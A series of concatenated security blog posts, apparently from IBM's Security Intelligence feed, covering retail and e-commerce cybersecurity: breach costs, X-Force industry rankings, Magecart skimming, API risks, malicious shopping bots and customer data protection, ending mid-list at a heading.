It’s the most wonderful time of the year for retailers and wholesalers since the holidays help boost year-end profits. The National Retail Federation (NRF) predicts 2022 holiday sales will come in 6% to 8% higher than in 2021. But rising profits that come at the cost of reduced cybersecurity can cost companies in the long run when you consider the rising size and costs of data breaches.

The risk of data breaches and other cyber crimes can make this shopping season feel pretty perilous. It makes sense to learn about the types of cyberattacks aimed at this sector, particularly at this time of year, and what retailers and wholesalers can do to protect themselves.

’Tis the season for cyber crime

Consumers started holiday shopping enthusiastically this year and have spent at record levels, despite inflation concerns. Adobe Analytics forecasts consumers will spend $209.7 billion online between Nov. 1 and Dec. 31. Hackers stand ready to steal their slice of the loot. Check Point Research found a sharp increase in fake shopping sites ahead of Black Friday sales. They also found that 17% of malicious files distributed by email in November were related to orders, deliveries and shipping and since the start of November, 4% of all new shopping-related websites were found to be malicious. Fake websites and phishing scams were the prime means of duping consumers.

Wholesalers and retailers rank as threat targets

Retail and wholesale were the fifth-most targeted industries according to the X-Force Intelligence Threat Index 2022 ranking. They accounted for 7.3% of all attacks in 2021. Among those attacks, 35% were aimed at retail and 65% at wholesale. This split reveals the increased interest of threat actors in wholesale operations, perhaps due to their critical role in supply chains and the transport of goods from manufacturers to third-party resellers and even direct to consumers. The report notes that phishing was the top infection vector for the sector, with stolen credentials coming in second, and vulnerability exploitation coming in third.

Below are tips for retailers and wholesalers to avoid becoming a cyber crime victim during the holiday season and all year long. Following this advice can help make your enterprise a safer shopping and selling environment.

1. Educate users and consumers

Cyber criminals never stop learning and refining ways to attack. You need to take the same approach by committing to continuous education to ensure your users and consumers stay informed about how attacks evolve. This can include annual or bi-annual training sessions for internal teams, which include real-world examples of social engineering, phishing, vishing and spoofing attacks. You may want to incorporate regular testing and assessment to ensure the training has been successful. You may also find an education campaign helpful for your consumers. Ensure they know where they can find accurate information about sales and deals. Also, help them learn signs for knowing which websites are legitimate and which are suspect.

2. Use a multilayer approach to fight phishing

There’s no one-size-fits-all approach to stopping phishing attacks. These attacks are simple to execute, and hackers work constantly to improve their approaches making fake emails harder to detect. A multi-layer approach erects defenses to make these attacks more difficult to deploy.

• Educate users on what to watch for. This education should include real-world examples.
• Email software security tools can help filter out malicious messages.
• Eventually, a phishing email will slip through. Use defenses that quickly catch malware and unusual lateral movements through your network, such as behavior-based anti-malware detection.

3. Apply a zero trust model

A zero trust framework assumes your network is always at risk from both internal and external attacks. When that belief is your starting point, it clarifies the policies and strategies used to counter threats. These tips can get you started:

• Identify your most valuable assets. The point of zero trust is to protect what’s most valuable for your company. For retailers and wholesalers, that’s likely consumer PII.
• Define roles and limit access. Your data and resources should be inaccessible by default. Follow the rule of least-privilege access so that only certain roles under specific circumstances can access information.
• Verify every connection. Default to authenticating and authorizing every connection, internal or external.
• Wall off your networks. The ability to move laterally from one network server to another is a prime culprit in data breaches. Walling off networks and preventing that lateral movement can help contain the damage if and when a break occurs.

4. Take vulnerability management seriously

Software vulnerabilities provide fertile ground for security breaches. Applying timely patches and updates helps close some of these vulnerabilities, but they evolve so quickly that it can feel like a losing battle. These tips help refine your vulnerability management response:

• Set up a team dedicated to vulnerability management.
• Sign up for alerts from national agencies, like the Cybersecurity and Infrastructure Security Agency (CISA). These alerts describe the threat and offer resources and advice to mitigate damage.
• You can also turn to sources like IBM’s X-Force Exchange, a repository of vulnerabilities and criticality levels to identify the most concerning vulnerabilities, and to X-Force Red, a specialized vulnerability scanning and management service.

5. Automate security to ease the workload of your security and IT teams

Speed matters when addressing security threats. Using automation to identify and respond to threats can help slow or even stop attacks before they escalate. Automation can outsource to machines the tasks that would take human teams much longer to accomplish. This type of outsourcing also helps relieve some of the pressure that your security and IT teams feel when threats arise.

To outsource these tasks, you can look to automation tools. For example, the IBM Security QRadar SOAR platform provides a central hub to make incident response more efficient. It also correlates security alerts to intelligence feeds to unearth malicious indicators and malware incidents. The tool also offers playbooks that help guide your team on the steps to follow during incident response.

The holiday season should be a wonderful time of year for retail and wholesale businesses. Strengthening your cybersecurity defenses helps ensure the holidays remain happy and profitable and reduces the chance of putting your users or consumers at risk.

The post 5 ways to improve holiday retail and wholesale cybersecurity appeared first on Security Intelligence.

Whether it’s online or brick-and-mortar, every new store or website represents a new potential entry point for threat actors. With access to more personally identifiable information (PII) of customers than most industries, bad actors perceive retail as a great way to cash in on their attacks. Plus, attackers can duplicate attack methods more easily since retailers share similar cybersecurity infrastructure.

The good news for retail is that the cost of a data breach in the sector remains low compared to many industries. However, this does not mean cybersecurity shouldn’t be a high priority. For retail, intangible costs like company reputation are often more important.

What is a retail data breach?

Retail data breaches result in attackers making off with customer data: credit card numbers, names, addresses and (in the case of e-commerce data breaches) even passwords. Retail data breaches also involve attackers gaining access to company data or accounts.

The methods attackers use to breach data in retail include:

• Skimming credit card information at the point of sale
• Sending phishing emails to social engineer information to obtain passwords or bank account numbers
• Sending or injecting malware that can steal or wipe data
• Using ransomware that holds data hostage until the victim pays a fee
• While not a direct breach, attackers can also launch a denial of service (DOS) attack as a tactic to execute the breach.

Well-known recent retail data breaches

In June 2021, Wegmans suffered a breach due to cloud misconfiguration. Although the company did not disclose the number of exposed customers, personal data compromised included customer names, home and email addresses, phone numbers, loyalty club numbers, birthdates and passwords to online accounts.

Fashion retailer Guess faced a ransomware attack in July 2021. Attackers breached an undisclosed number of customer records. Personal data affected included driver’s license numbers and Social Security numbers. The attackers may also have been able to access other personal financial data and passport numbers.

In November, Panasonic disclosed an attack that at first only contained business partner and proprietary data. In January 2022, it announced that attackers also accessed job candidate and intern data.

How much does a retail data breach cost?

As noted above, retail data breaches are far down the list of the most costly. According to the 2022 IBM Cost of a Data Breach Report, the average cost of a data breach in retail in 2022 is $3.28 million, a very modest increase from the $3.27 million per breach in 2021. However, retail moved up from 15th to 14th on the list of most costly data breaches per industry.

In the retail sector, data breach costs go beyond what might be lost or stolen from companies or customers.

Costs may also include:

• Making good with customers in cash or credit and identity monitoring
• Litigation in the event of a class-action lawsuit
• Breach repairs and future breach prevention.

Don’t forget that for retail, damage caused by loss of consumer confidence can be very costly to a company’s good name and bottom line.

According to the report, the largest share of data breach costs in 2022 was detection and escalation, at $1.44 million. That’s an increase from $1.24 million in 2021, or 16.1% growth. These costs include tasks that enable a company to detect a breach. These costs include forensic and investigative work, assessment and audit services, crisis management and communications to executives and boards.

Prevention strategies

For retail even more than in other industries, the customer is paramount. Security workers in this field need to base their strategy upon a foundation of controlling what sensitive data is available to whom, the type of data and that it can be reached when needed.

Retailers must be vigilant about security across all fronts, from protecting data at the point of sale to safeguarding the servers where customer data is stored. An excellent strategy for this is adhering to good security hygiene like network segmentation, which splits networks into separate segments. For example, you’ll want to segment Internet of Things devices (more and more common in the retail sector) away from other devices or resources containing sensitive data. This also protects your network’s data from third-party vendors. These need access to specific devices but shouldn’t be able to access anything else. The 2014 Target breach was a classic example of the importance of third-party risk management.

Another strategy retailers can use to mitigate risk is to use the latest in point of sale tools. Accept EMV chip cards and mobile wallet payments.

Finally, retailers should consider adopting modern security tools like artificial intelligence (AI) and automation and move toward the zero trust model to protect information at every level, from corporate headquarters to storefronts and their e-commerce sites.

Why? These tools and technologies are clearly working. According to the 2022 report, breaches at organizations with fully deployed security AI and automation cost $3.05 million less than breaches at those without. This 65.2% difference in average breach cost represents the largest cost savings in the study.

For retailers without a data breach prevention strategy already in place, 2022 is a great year to start.

The post Cost of a data breach: Retail costs, risks and prevention strategies appeared first on Security Intelligence.

Every year, the IBM Security X-Force team of cybersecurity experts mines billions of data points to reveal today’s most urgent security statistics and trends. This year’s X-Force Threat Intelligence Index 2022 digs into attack types, infection vectors, top threat actors, malware trends and industry-specific insights.

This year, a new industry took the infamous top spot: manufacturing. For the first time in over five years, finance and insurance were not the top-attacked industries in 2021, as manufacturing overtook them by a slight margin. Here’s a breakdown of the top five industries targeted and what businesses need to know about each one.

#1 Manufacturing

For the first time since 2016, manufacturing was the most attacked industry in 2021, targeted in 23.2% of the attacks addressed by X-Force.

Accounting for 23% of attacks, ransomware was the top attack type, exposing the heavy focus ransomware actors place on manufacturing. Server access attacks came in second place at 12%, which might represent some failed attack operations. Business email compromise (BEC) and data theft tied for third place, at 10% each.

BEC attacks often seek to take advantage of manufacturer relationships with suppliers, sub-suppliers and wholesale shipping. Threat actors redirect payments between partners to accounts under the BEC attackers’ control. Meanwhile, data theft efforts may focus on stealing sensitive intellectual property or holding data for ransom.

#2 Finance and insurance

Attackers hit finance and insurance companies in 22.4% of attacks remediated by X-Force in 2021. Compared to prior years, the financial industry’s attack rate has fallen. This suggests that financial companies are putting higher standards in place. In addition, financial services use hybrid cloud environments, which enable improved data visibility and management.

Server access breaches (14%) were found to be the top attack type on finance and insurance companies. This was followed by ransomware, misconfigurations and fraud, all coming in at 10%. Meanwhile, phishing was the most common infection vector for financial services, leading to 46% of attacks against this sector in 2021.

#3 Professional and business services

Professional services include IT providers, law firms, architects, accountants and consultants. Business services include office administration, HR, security services, travel assistance and landscaping. Professional and business services firms accounted for 12.7% of all attacks observed in 2021.

Ransomware was the top attack type for this sector, making up 32% of all attacks observed by X-Force. Server access attacks were the second-most common attack type (19%). A decrease in ransomware attacks in Q4 suggests that professional services firms are doing a better job at thwarting ransomware attacks. Vulnerability exploitation accounted for 50% of incidents, and phishing accounted for another 20% in this sector.

#4 Energy

The energy industry was the fourth most attacked in 2021, with 8.2% of all attacks observed. The X-Force report speculates that threat actors shifted their focus away from energy entities for a brief time in fear of retaliation for the ransomware attack on the Colonial Pipeline in May 2021. But attack rates appear to be rising since September.

Ransomware (25%) was the most common attack type against energy organizations in 2021. This was followed by remote access trojans (RATs), direct denial of service and BEC, all of which tied for second place (17%). Phishing was the most common attack vector, making up around 60% of attacks against the energy sector. Vulnerability exploitation made up the other 40% of incidents.

#5 Retail and wholesale

Retail and wholesale were the fifth most targeted in X-Force’s 2022 ranking. Overall, the sector faced 7.3% of all attacks. Within the sector, retail accounted for 35% and wholesale 65% of attacks. Threat actors may have focused more on wholesale groups due to their role in supply chains.

BEC, server access, data theft and credential harvesting were the top attack types on retail and wholesale last year. Ransomware and banking trojans also accounted for a large number of attacks, followed by RATs, misconfiguration and fraud. Phishing was the top infection vector for the sector, accounting for 38% of the attacks. Stolen credentials were the second most common vector at 31%. Meanwhile, vulnerability exploitation made up another 23% and brute force 8%.

Adapt and thrive

The threat landscape is constantly changing, and each industry has its unique challenges. Overall, ransomware continues to be the top threat in most sectors. As shown by the improvement in finance and insurance, efforts to strengthen digital defenses lead to concrete results against established and emerging threats.

The post Lessons learned by 2022 cyberattacks: X-Force Threat Intelligence Report appeared first on Security Intelligence.

Did your company or e-commerce firm recently buy third-party software from a value-added reseller (VAR) or systems integrator? Did you vet the vendor code? If not, you could be at risk for a Magecart group attack.

Magecart is an association of threat actor groups who target online shopping carts, mostly from within the e-commerce platform Magento. The Magecart name is derived by combining ‘Mage’ (from Magento) with ‘cart’ (shopping cart). This type of attack is especially dangerous as it only takes one line of code to steal payment card data.

Magecart attacks can compromise a piece of third-party software from a VAR or systems integrator. Recently, they’ve been infecting a variety of supply chain processes.

Let’s take a closer look at this malicious attack vector and how it has evolved over time. Later, we’ll explore ways you can protect your business and customers from Magecart attacks.

Magecart: Just One Line of Code

Back in 2015, Magecart made global headlines with a series of high-profile attacks targeting some big names in air travel, ticketing and retail.

In the classic Magecart attack, threat actors insert a single line of malicious code, such as a JavaScript sniffer. Once installed, whenever a user lands on the compromised website’s shopping cart or checkout page, the code downloads the JS sniffer. From there, attackers can intercept any information entered onto the page and send the data to the attacker.

This type of credit card number decoder attack is also known as a credit card skimmer, digital skimmer, web skimmer or formjacking.

Magecart can skim anything entered into an online data form, such as card numbers, expiration dates, CVC codes, names, addresses, phone numbers, email addresses and so forth. This data can then be used for identity theft or fraud. In other cases, it ends up for sale on the darknet.

Moving to Third-Party Targets

At first, Magecart targeted specific businesses, large and small alike. More recently attackers have pivoted to target advertising supply chains. Researchers have detected skimming scripts on thousands of websites of all kinds, from flight booking services to retail, cosmetic, health care and apparel companies.

In this version of the attack, instead of specific businesses, threat actors target vendors that supply code that enhances website functionality. For example, web-based ad software suppliers work with thousands of clients. This means the vendor spreads the infected code for the attackers without knowing about it.

Anyone relying on a third-party vendor for part of their website code is at risk. If you drop in code for analytics, you might also insert Magecart payload into your website.

More recently, attackers have even used hosting services as vectors to infect client sites with Magecart. Attackers also cloak malicious code by hiding script in the metadata of image files or authentic CSS files. As a detection technique, some even seek an online steganography decoder service in an attempt to reveal hidden code.

Magecart Supply Chain Threat

As mentioned, for every third-party software vendor there might be another Magecart attack. For instance, a single vendor can provide ticketing, touring and booking services to hundreds of clients. Next, attackers could compromise any kind of media or entertainment site due to infected code. Infected content could also arrive through a content delivery network (CDN). In essence, any website that engages in transactions online or that collects user data could be breached by Magecart.

When Magecart first appeared in 2015, the primary target was open-source Magento e-commerce platforms. Today, the threat is more and more expansive across a wide variety of software categories. One multi-functional script was discovered to be skimming data from a whopping 57 different payment platforms.

Ant and Cockroach Skimmer

Magecart groups most often use the ant and cockroach technique. It involves the following:

• Separate ‘loader’ and ‘skimmer’ code
• Checks to target URLs linked to checkout pages with developer tools disabled
• “Radix” obfuscation technique disguises skimming code
• Attackers often make slight tweaks to malicious code to avoid detection.

Magecart attacks continue to increase in scope and sophistication. E-commerce and supply chain businesses face increasing pressure to protect their websites against these threats.

Stopping Magecart Attacks

While there’s no magic bullet to prevent skimming attacks, there are some tools and strategies that can help improve and harden your security.

Zero Trust

Consider adopting a zero-trust approach with JavaScript on your sites. This begins with a policy to block access by default to any sensitive information entered in web forms and stored cookies. From there, only a select set of vetted scripts (mostly ones that you author and/or own) is allowed to access sensitive data. If malicious skimming code does infect your site, it’s less likely to access any of the sensitive information.

Third-Party Risk Management

Directed third-party risk management creates a centralized, tightly mapped structure of third-party risk hierarchy including risks, controls, locations and regulations. These models support third-party categorization based on risk, criticality and other factors. Configurable methodologies can assess and score inherent and residual third-party risks. This includes capturing detailed vendor risk data, including severity, impact, mitigating plans and other issues.

Subresource Integrity

Subresource Integrity enables browsers to verify that the resources they fetch are delivered without unseen manipulation. It works by allowing you to provide a cryptographic hash that a fetched resource must match.

Subresource Integrity enables you to mitigate attack risk by ensuring that the files your web application or web document fetches (such as from a CDN) have arrived without a third-party having injected any additional content or changes into those files.

Content Security Policy

Content Security Policy is an added layer of security that helps to detect and mitigate certain types of attacks, including cross-site scripting and data injection attacks. These attacks are used for everything from data theft to site defacement to malware distribution.

Protect Your Business & Customers

The worst thing you can do is pretend like Magecart attacks don’t exist, or think you can’t be affected. If you use third-party software to collect data on your site, it pays to look into protection efforts against Magecart.

The post Magecart Attacks Continue to ‘Skim’ Software Supply Chains appeared first on Security Intelligence.

Today, a lot of the digital innovation we see is largely thanks to the application programming interface (API). Without APIs, rapid development would be nearly impossible. After all, the API is the link between computers, software and computer programs. But wherever there’s a link, a potential data security weakness exists.

Essential for modern mobile, SaaS and web applications, APIs are nearly ubiquitous in everything from front office, back office and internal applications. By nature, however, APIs expose application logic and sensitive data such as Personally Identifiable Information (PII). This makes APIs juicy targets for database security attackers.

Meanwhile, due to market pressures and customer demand, omnichannel e-commerce has ramped up considerably. And so has API security risk along with it.

APIs and Omnichannel Grow Together

The number of Postman Collections (API folders for developers to group API requests together) skyrocketed from less than half a million to nearly 35 million between 2016 and 2020. There’s no doubt that API use will continue to increase in the future.

Three major shifts generated this massive growth in API use:

• Multi-device use: As people connect from many devices at once, APIs are needed to power these connections.
• Microservices: The move away from a monolithic architecture to more flexible microservice-based development requires APIs.
• Move to the cloud: Driven by the advantage of rapid provisioning, the shift from on-premise to the cloud means APIs are built and deployed faster than ever.

Meanwhile, all of this API activity benefited (and was driven by) the rise of omnichannel e-commerce.

Omnichannel retail is a multichannel approach to sales that creates a seamless customer experience. This means whether the customer shops from a mobile device, PC or brick-and-mortar store, the experience is unified across all channels. And omnichannel development would be impossible without APIs.

API-led connectivity overcomes obstacles that retailers face gathering data from disparate systems to then consolidate the data into monolithic data warehouses. Since each individual system updates separately, information may be out-of-date by the time it hits the database.

APIs enable retailers to build an application network that serves as a connectivity layer for data stores and assets in the cloud, on-premises or in hybrid environments. As a result, mobile applications, websites, IoT devices, CRM and ERP systems (order management, point of sale, inventory management and warehouse management) can all work as one coherent system that connects and shares data in real-time.

Increase in API Security Breaches

The downside to this rapid growth and development in e-commerce has been a concerning rise in API security attacks. Here, threat actors have executed numerous high-profile breaches against public-facing applications. For example, developers use APIs to connect resources like web registration forms to various backend systems. This tasking flexibility, however, also creates an entrance for automated attacks.

Some investigations reveal the average web application or API has nearly 27 serious vulnerabilities. Organizations can have hundreds or even tens of thousands of applications. It’s no wonder then that some of the biggest brand names have been subject to API-related security breaches.

The real-world damage includes exfiltration of personal data of high profile personalities, food supply chain vulnerabilities and the theft of tens of millions of individual private records.

OWASP API Security Project

The growing API and application vulnerabilities risk prompted OWASP to establish their top 10 hit list for API-related attacks. Here’s a high-level summary:

• API 1 – Broken Object Level Authorization: APIs can expose endpoints that handle object identifiers, creating a wide attack surface Level Access Control issue.
• API 2 – Broken User Authentication: Incorrectly implemented authentication allows attacks to compromise authentication tokens or steal user IDs.
• API 3 – Excessive Data Exposure: With generic implementations, developers may expose all object properties without considering individual sensitivity.
• API 4 – Lack of Resources & Rate Limiting: APIs frequently do not place restrictions on the size or number of resources that can be requested by the client/user. This may facilitate DDoS or brute force attacks.
• API 5 – Broken Function Level Authorization: Complex access and administration control policies can lead to authorization flaws. This exposes user resources and/or other administrative functions.
• API 6 – Mass Assignment: Attaching client-provided data (e.g., JSON) to data models, without proper allow-lists allows attackers to modify object properties.
• API 7 – Security Misconfiguration: Arises from unsecured default configurations, incomplete or ad-hoc configurations, open cloud storage, misconfigured HTTP headers, unnecessary HTTP methods, permissive Cross-Origin resource sharing (CORS) and verbose error messages containing sensitive information.
• API 8 – Injection: Injection flaws (SQL, NoSQL, Command Injection, etc.) occur when untrusted data is sent to an interpreter as part of a command or query. Malicious data can trick the interpreter into executing unauthorized commands.
• API 9 – Improper Assets Management: APIs can expose many endpoints making proper and updated documentation even more critical. Proper hosts and deployed API versions inventory play an important role to mitigate threats.
• API 10 – Insufficient Logging & Monitoring: Insufficient logging and monitoring, coupled with missing or ineffective integration with incident response, allows attackers to further attack systems, maintain persistence, enter other systems and extract or destroy data.

API Vulnerability Assessment & Mitigation

Given the risk and high stakes involved, how can you strengthen your API threat management strategy? Here are some best practices:

Keep an API Inventory

It is important to know where your APIs are, including APIs from older versions and different environments. API security is improved when you document which endpoints each API host exposes, which endpoints are public (don’t require authentication) and which ones can be accessed from the internet.

Practice Secure Coding

Encourage your developers to use secure coding practices since most API vulnerabilities start from within the code. Focus on secure coding in the production phase.

Implement OAuth

Access control for authentication and authorization is critical for API security. OAuth is a token-based authorization framework that allows user information to be accessed by third-party services without exposing user credentials. This is how websites leverage Google and Facebook to authorize access.

Rate Limiting & Throttling

To defend against DDoS attacks, API spikes and other performance issues, you can place rate limits on how often APIs can be called. Rate throttling smooths out traffic by balancing access with availability.

Use an API Gateway

An API gateway is a central point of enforcement for API traffic. A solid API gateway allows you to authenticate traffic, control API use and analyze API activity.

Use a Service Mesh

Service mesh technology enables API management and control by routing requests from one service to the next. A service mesh ensures that proper authentication, access control and other security measures work together for improved API security.

A service mesh is especially critical as the use of microservices increases. As the number of services increases, the number of potential ways to communicate grows exponentially. A service mesh provides a unified way to configure communication paths by creating a policy for the communication.

A service mesh instruments the services and orchestrates communications traffic according to a predetermined configuration. Instead of configuring a running container, or writing code to do so, an administrator can provide configuration to the service mesh and have it complete that work.

Adopt Zero Trust

As a wider security philosophy, zero trust assumes you’re an attacker until proven otherwise. Zero trust requires verification and authorization for every device, every application and every user gaining access to every resource.

E-commerce Needs Secure APIs

For competitive brands, the omnichannel experience will continue to grow in diversity and scope. APIs will scale likewise. It’s important to adopt a pro-active API security stance now to keep your customers, business and assets safe.

The post Omnichannel E-commerce Growth Increases API Security Risk appeared first on Security Intelligence.

Online shopping bots are not new to the e-commerce world. Stores use bots to offer better customer service, but malicious bots can cause major harm to a business. These pose cybersecurity risks to e-commerce retailers and consumers alike.

Some customers use shopping bots to execute automated tasks based on a set of instructions, such as log onto website -> look for specific product -> add product to cart -> check out. Almost all shopping bots have an unfair advantage. For example, if a user wanted to manually wait for a restock of their favorite items, such as sought-after sporting event tickets or collectible trading cards, they would have to sit by their computer all day and refresh their browser by hand.

However, shopping bots do this work for them. They could program the software to search for a specific string on a certain website. When that happens, the bot runs a task to add the product into the shopping cart and check out or, in some cases, notify an email address. If shopping bots work correctly and in parallel with each other, the sought-after product usually sells out quickly.

How Shopping Bots Can Pose Cybersecurity Risks

The general impression of a shopping bot is that it makes sales. So, what could the problem be with shopping bots?

While good bots are welcome, some bots can be malicious, especially if they are in the wrong hands. One survey showed that businesses have lost more than $100,000 in revenue from a single bot attack.

E-commerce sites being attacked by bad shopping bots are not new. An Imperva report presented the following statistics:

• Bots comprise 30.8% of traffic to e-commerce websites
• Of all the traffic to e-commerce sites, 17.7% comes from bad bots
• Nearly 23.5% of these bad bots qualify as sophisticated bots.

So, how can you tell a good bot from a bad one? Some types can pose more business and cybersecurity risks to online retailers and customers than others.

Credential Stuffing

These bots pretend to interact with the system as real customers by using customers’ real identities, obtained either from the internet or bought from the dark web. Such bots compromise vulnerable passwords to obtain user credentials. The stolen information can include email addresses, credit card numbers and other information. It enables these adversaries to launch cyberattacks like phishing, business email compromise and malware attacks. These bots affect the confidentiality, integrity and availability of data in systems and could have a negative impact on a firm’s reputation.

Inventory Denial

Sometimes, it becomes virtually impossible to purchase a product online because it is sold out. This could be the work of inventory denial bots. These mimic human traffic to access e-commerce websites and fill items in large volumes in checkout baskets. This act fools the system into thinking that the inventory has been sold out. As a result, it causes negative feedback from customers about the targeted brand on social media. Threat actors behind such malicious bots do not purchase the items right away. Instead, they offer them for sale on alternative websites at higher prices. Once the customer places the order, the bot completes the transactions by off-loading the carts, helping the malicious actors earn a profit in the bargain.

Scalping Bots

Scalping bots search the internet for limited-availability products, which could be out of stock when users look for them. These bots automatically add the items to the cart the moment they become available, autofill the purchase forms and perform checkout in a short time so that the real customers who are waiting for the items can’t purchase them. Besides causing financial loss to the business, scalping bots rob it of the chance to know who its real customers are. These bots prevent the business from cross-selling products and engaging with customers to promote other merchandise.

Scraper Bots

Scraper bots scan web pages and browse for items and vulnerabilities to scrape them into a dark web library. These bots use application programming interfaces to place orders and complete transactions without navigating an e-commerce website as humans do. Thus, they act like inventory denial bots to cause sell-outs or even website crashes. Malicious actors use such data to undercut deals from genuine retailers by lowering their prices.

Keeping Ahead of Shopping Bots

Shopping bots can harm business reputation by tarnishing brand image, crashing websites, increasing support costs, jeopardizing business deals, severing connections with customers and negatively affecting crucial decision-making processes. Besides, these bots contain valuable data that the adversaries behind them can exploit for profit.

This is another reason retailers should be sure to adopt the right cybersecurity measures. Stay updated on how threat actors work and how they can use these bots to infiltrate your information assets.

The post How Shopping Bots Can Compromise Retail Cybersecurity appeared first on Security Intelligence.

E-commerce sales grew by nearly one-third in 2020, in large part due to the pandemic. Meanwhile, retail data breaches grew even more prevalent and costly. Retailers need to know not just the cost of a data breach, but the risks and challenges involved with one. This can help IT security professionals and business owners protect against attacks. It also helps to look at some of the more infamous data breaches of the past year. Be prepared by knowing what threats to protect against.

What Is a Retail Data Breach?

A retail data breach involves attackers stealing customer data. That can include credit card numbers, names, addresses and, in the case of e-commerce data breaches, even passwords. It can also involve attackers gaining access to company data or accounts, which increases the cost of a data breach.

There are several types of retail data breaches, including:

• Skimming at the point of sale, where thieves steal credit card information and use it to make unauthorized purchases
• Phishing, where threat actors social engineer information to obtain passwords or bank account numbers
• Malware, or software that can steal or wipe data
• Ransomware, or software that holds data hostage until the victim pays a fee.

Well-Known 2021 Data Breaches

A popular men’s clothing retailer, with both e-commerce and brick-and-mortar locations, suffered a devastating breach earlier this year, with customer data — including partial credit card information — stolen from millions of customers. The data was posted on a hacker forum after it was downloaded from the company’s backup cloud.

High-End Fashion Retailer Data Breach

Another high-end fashion retailer selling men’s, women’s and children’s clothing revealed a data breach in July. It included account numbers, debit and credit card numbers and other personal and financial information.

The retailer offered customers involved in the breach one year of free credit monitoring and identity theft protection services.

Big-Box Chain Store Data Breach

When many people think of shopping today, they think of big box stores. These chains face the same challenges as other retailers in protecting customer data. In spring 2021, one big-box store suffered a cloud-bucket misconfiguration. This lead to more than 300,000 customers having their data stolen.

The information exposed in the breach included names, phone numbers, addresses and the last four digits of credit and debit cards.

Children’s Clothing Retailer

Attackers stole personal and shipping information from more than 410,000 people in one June 2021 attack. Specifically, they struck online shoppers in a third-party data breach. Data included names, addresses, phone numbers, purchase details and more.

Grocery Store Chain

Several supermarket chains suffered data breaches in 2021. One in particular exposed cloud-based databases bearing customer information to the general public. Data may have included personal information, email addresses and passwords to loyalty club accounts. The company said the passwords were hashed and not visible in the data breach.

Auto Manufacturer and Dealer

Retail data breaches aren’t limited to places people may shop on a weekly basis. An auto manufacturer experienced a data breach in 2021 that affected 3.3 million car buyers and shoppers across the U.S. and Canada.

The breach affected the automaker’s website as well as some of its dealers, exposing consumer information that had been collected for sales and marketing between 2014 and 2019. Data exposed included driver’s license numbers for more than 90,000 people, which could open those customers to identity theft. A smaller number of customers had their social security or tax ID numbers stolen, along with their dates of birth.

However, 97% of those involved in the breach had only their contact information and vehicle data — including the Vehicle Identification Number, in some cases — taken.

How Much Does a Retail Data Breach Cost?

The good news is that, in spite of their prevalence, retail data breaches are not anywhere close to the most costly. The average cost of a data breach in retail in 2021 is $3.27 million. Retail ranks 15th on the list of most costly data breaches. However, the cost jumped steeply from 2020, when each breach cost an average of only $2.01 million, according to the 2021 Cost of a Data Breach Report. That represents a 62.7% increase, which was the fourth-highest increase, percentage-wise, out of the 17 industries analyzed in the report.

It’s important to remember that the costs of a data breach include not just money that may be stolen from the company or its customers, but also the costs of:

• Compensating customers with credit monitoring and identity monitoring services or cash
• Litigation if a class-action suit occurs
• Fixing the breach and preventing future breaches.

Plus, there’s the high — and often unmeasurable — cost of lost consumer confidence that can damage your company’s reputation and result in lost sales.

The Cost of a Data Breach Report indicated that lost business held the lion’s share of data breach costs, representing 38% of the total costs of a data breach across industries. In a field like retail, that number may be higher than the average since a company’s reputation — and therefore, sales — relies heavily on keeping customer data safe.

What Are the Risks and Challenges of Data Security in the Retail Industry?

The massive spike in e-commerce sales in the past year created additional challenges for shopping websites to keep customer data safe. In addition, the retail industry faces many challenges in preventing data breaches.

First, stores must be vigilant about security across all fronts, from protecting data at the point of sale to protecting the servers where customer data is stored.

Store owners can mitigate risk by ensuring they use the latest in point of sale technology, including accepting EMV chip cards and mobile wallet payments. Companies should also deploy the latest tools online, including artificial intelligence and the zero trust model of IT security, to protect information at every level — from corporate headquarters to storefronts and, especially, on their e-commerce sites. That way, you can worry less about the cost of a data breach.

The post Cost of a Data Breach: Retail Costs, Risks and More To Know appeared first on Security Intelligence.

More people are shopping online than ever before due to the pandemic. Therefore, businesses had to take extra steps to protect customer data, combat fraud and implement the latest in online safety. In 2020, e-commerce retail sales jumped from 16% to 19%, according to data from United Nations trade and development experts from UNCTAD.

In the U.S., online retail sales jumped 32.4% year-over-year in 2020. The trend continued with a 39% increase in Q1 2021. Reports from IBM’s U.S. Retail Index showed the pandemic sped up the shift away from brick-and-mortar stores by five years. Consumers began to shop for items from school supplies to clothing online.

Retailers are working harder than ever to protect consumers’ data. However, this doesn’t mean they should let up at the point of sale (POS), either.

Check out our tips to help e-commerce and brick-and-mortar retailers protect customer data and their own financial interests from retail cyber attacks. After all, it’s good for businesses to prepare for challenges in the years ahead.

Briefs and Top Insights

🕒  3-minute read

The Shift to E-Commerce: How Retail Cybersecurity Is Changing 

Knowing the threats related to e-commerce security and customer data can help you combat malware and ransomware attacks. It also keeps you aware of data breaches that can threaten your customers’ personally identifiable information and money. BDO International found 57% of retail business owners said that bolstering retail cybersecurity ranked in their top three short-term business goals. However, only about 40% listed it in long-term business goals. Taking a far-sighted approach to digital safety, which includes choosing the right platform for your business, can help you stay ahead of attackers.

Other customer data best practices include:

• Segment your network to keep customer data safe within separate buckets
• Install the right malware detection solution across your network, without neglecting POS security
• Invest in threat intelligence systems.

🕒  4-minute read

Retail Cybersecurity: How to Protect Your Customer Data 

Personalization through artificial intelligence leads to better customer experiences online and more relevant product recommendations. However, increased amounts of customer data also lead to more for attackers to steal in a retail data breach.

To best protect crucial information, first consider each type of data in various buckets. Next, determine its physical location and the best ways to secure it. Deloitte divides customer data into four types:

• Account, including customer name and address
• Location, including geographic data and IP addresses
• Browser data, including the customer’s history
• Profile, demographics and social media data collected from third-party sites.

Once you’ve found and sorted the different types of data, you can take the following steps to protect it, online and off:

• Encrypt data, both from online and brick-and-mortar sales
• Ensure your POS system is updated, including enabling chip and PIN and digital wallet sales
• Train employees on the importance of securing passwords, not connecting their own mobile devices to your store’s network and how to spot an attack in progress.

🕒  3-minute read

CISO of Major UK Retailer Weighs In on Enterprise IoT Security 

Threats in the retail industry extend beyond customer data security online and in POS transactions. Simon Langley, CISO of UK grocery retailer Morrisons, discussed some of the threats facing businesses adopting Internet of Things (IoT) devices. Reports say that growing numbers of businesses will face attacks that come through the IoT, including through employees’ own digital assistants and other IoT devices.

AI and machine learning stand as possible ways to combat the threat, along with increased efforts to detect anomalies and unmanaged devices on the network. Proactive risk management of IoT devices can help chief information security officers (CISOs) not just combat IoT attacks but also innovate new ways to protect against any security risks in the retail environment.

More on Customer Data Security From Around the Web

2020 Sees Huge Increase in Records Exposed in Data Breaches

Although the number of data breaches in 2020 dropped by nearly half (48%), they exposed more than 37 billion records, spotlighting a need for enhanced cybersecurity measures as more consumers shop online.

Nearly Half of Retailers Hit by Ransomware in 2020

